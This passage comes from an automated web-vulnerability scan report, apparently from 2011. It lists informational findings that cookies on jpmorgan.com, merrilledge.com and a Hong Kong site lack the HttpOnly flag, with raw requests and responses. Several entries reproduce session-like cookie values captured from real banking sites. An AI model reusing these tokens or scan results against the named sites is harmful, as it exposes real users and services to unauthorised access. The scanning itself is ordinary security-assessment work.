User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:45 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:10 GMT
ETag: "8e6f7-1288-70180e80"
Accept-Ranges: bytes
Content-Length: 4744
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us builder.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributabl
...[SNIP]...

11.655. http://www.jpmorgan.com/script/lightbox_support/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/controls.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/controls.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:56 GMT
ETag: "8e703-87e3-72d5f600"
Accept-Ranges: bytes
Content-Length: 34787
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...

11.656. http://www.jpmorgan.com/script/lightbox_support/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/dragdrop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/dragdrop.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:45 GMT
ETag: "8e704-7950-722e1d40"
Accept-Ranges: bytes
Content-Length: 31056
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributab
...[SNIP]...

11.657. http://www.jpmorgan.com/script/lightbox_support/effects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/effects.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/effects.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:32 GMT
ETag: "8e705-9647-7167c000"
Accept-Ranges: bytes
Content-Length: 38471
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us effects.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (http://e
...[SNIP]...

11.658. http://www.jpmorgan.com/script/lightbox_support/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/prototype.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 18:37:43 GMT
ETag: "8e706-2224e-65d70bc0"
Accept-Ranges: bytes
Content-Length: 139854
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

11.659. http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/scriptaculous.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 18:38:24 GMT
ETag: "8e707-b78-6848a800"
Accept-Ranges: bytes
Content-Length: 2936
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us scriptaculous.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, fr
...[SNIP]...

11.660. http://www.jpmorgan.com/script/lightbox_support/slider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/slider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/slider.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:53:09 GMT
ETag: "8e708-27b2-739c5340"
Accept-Ranges: bytes
Content-Length: 10162
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us slider.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Marty Haught, Thomas Fuchs
//
// script.aculo.us is freely distributable under the terms of an MIT-style
...[SNIP]...

11.661. http://www.jpmorgan.com/script/lightbox_support/sound.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/sound.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/sound.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:53:21 GMT
ETag: "8e709-998-74536e40"
Accept-Ranges: bytes
Content-Length: 2456
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us sound.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Based on code created by Jules Gravinese
...[SNIP]...

11.662. http://www.jpmorgan.com/script/lightview.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightview.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightview.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Wed, 04 Aug 2010 00:45:05 GMT
ETag: "2cd52-949f-bea16640"
Accept-Ranges: bytes
Content-Length: 38047
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// Lightview 2.5.2.1 - 01-01-2010
// Copyright (c) 2008-2010 Nick Stakenburg (http://www.nickstakenburg.com)
//
// Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works
...[SNIP]...

11.663. http://www.jpmorgan.com/script/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/swfobject.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:45 GMT
Server: Apache
Last-Modified: Wed, 14 Nov 2007 17:03:46 GMT
ETag: "2c723-1a42-8c6a0080"
Accept-Ranges: bytes
Content-Length: 6722
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/**
* SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.opensour
...[SNIP]...

11.664. http://www.learningsolutions.com.hk/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:16:49 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:16:49 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:16:50 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:16:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 24527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...

11.665. http://www.merrilledge.com/m/pages/self-directed-investing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/self-directed-investing.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=8DVPG6bhLhltEG1FjhrgafC0CcuM/mzhZg+ZO4Fn4N7V8Ap55lrmyz9HWpZ+FVMYcuGvGsLs+F8fomu+ZqybyYrEqEFhdL+uE42cL4uzTOojaJYo1xb91lRcgZUAJzx6CG+Xvv8KLTkamtoYiMO0tXoyB5SnItLVDSCnSA7T6+JH6sF9+tCBdKyH8JAxP7JQXa7Gbyn7VfXyPbdn2MQ5YjS4TDtJiHPV2n3kwEIzWscBtsEdkM6B3v1AJFdcl961XkKl4NRv+R1cnaz0OJDIgtBgBOIAH33VI4JPEq6R5KFdMBd9oeCkaZdSV/RUibkCgyKsOopPRnBjAR1ucPhGAHIGXmpmJNjH9+p+u3tPYW+y7+fq/z+YtIQ9lLGo9PuXxLw4yf2ryu0xsfnN/cX0Rv5hKpnfqHXTiFNLdooF4fwFhVRPHVGcsX4+v9NJKw1e2k91+AU0eZaak/U3SNwC2zplr+xrLUnCiOnmv5aWpBA2QRFH4sqmlb7tOVHg76fm4QmkzCNoA0wieztn3baqZD/I86Hadaelj/nZ2rgCYs8h7uYmxIEzU6VGZ7ZCF2NoBYFeb4eIZlqZ/+or03iZf/6o5LLOb37KbV8wy0Exz8cy8AP6iADkE4FsuKEzScKb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=8ddb7e626e0c4eac90fb5dc54d017916; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

11.666. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/zero-dollar-trades.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=9sTztPG9LIpTqCRqm5C/4EacAM+v7Pe04GMW3r5atCVT71fZQlEkwugZOjyBvesjG5IMK7yC4z+rzi52Y2Rwfzioa6Te7w2siYkFLhTMBHilWY4Q6yBX7NgBAxU1BK1JRv0vK2haKUjfkBFQ4hSjXxU9DS2ElZwfKBDrfdwYRG/DfEkCZMfk7kOOv3/RCE7cXyczgqEb3jGq+lq14GXRid9xAckqjAw8nQQDb9QtElhfHjwQ13IMhVRuoNSl34XxSizadDPOfV5ROZ9ptH3YDolLXCkbRu+2t6/lBdbbpFWsJfJ7DclHs5472SkUIqFunvN7HfcOWkpUEeNtSZ86pP6LYe5ksGeClXhKqiGCumb0CdjphGaPavyyAa243o79JwOyKse04wKOloP6arxbLtLk8Av0o1NQ83V+rPNWmGvpKCtw6q5AOnDFr0JExL5pwuLMU8GXOq6LvQgdydKKEwi+kzu5A1cR6YW039SrUi8/P+OwrPBM58oY2ykRFCUTfS/jIs7yDuiPlaUSz7jJgCcALG0fDiV5utWLvZc+vNv6B+ra0Q3k7FFXg0vIFIJeSnPCAFTMbKDD5mSYSR/gvNgzHO5QN5BLiw3cG1uC2DYUEcY+zcFJ4hObnWi8iqYb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=fc00ac76623c478fade3bfb4e83564ed; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

11.667. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

11.668. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
